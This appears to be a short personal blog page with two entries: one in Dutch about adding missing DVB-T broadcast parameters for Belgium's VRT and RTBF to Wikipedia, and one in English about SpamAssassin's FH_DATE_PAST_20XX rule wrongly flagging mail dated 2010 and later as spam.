Ik heb toegegeven en voor mezelf een wikipedia account aangemaakt zodat ik de ontbrekende gegevens over de RTBF en VRT dvb-t uitzendingen kon toevoegen aan de pagina over DVB-T frequenties. Het blijft me opvallen dat deze informatie zeer slecht te vinden is. Dan maar wat extra google juice voor deze informatie : DVB-T guard rate, coding, error correction for VRT / RTBF Belgium.

Y2.01K problem: SpamAssassin had a rule since 2006 that e-mail with a date in the 'far future' was likely spam. The 'far future' was defined as 2010-2099. So today that rule started firing, leading to missed e-mail. Documentation for SpamAssassin Rule: FH_DATE_PAST_20XX. Time for an update there...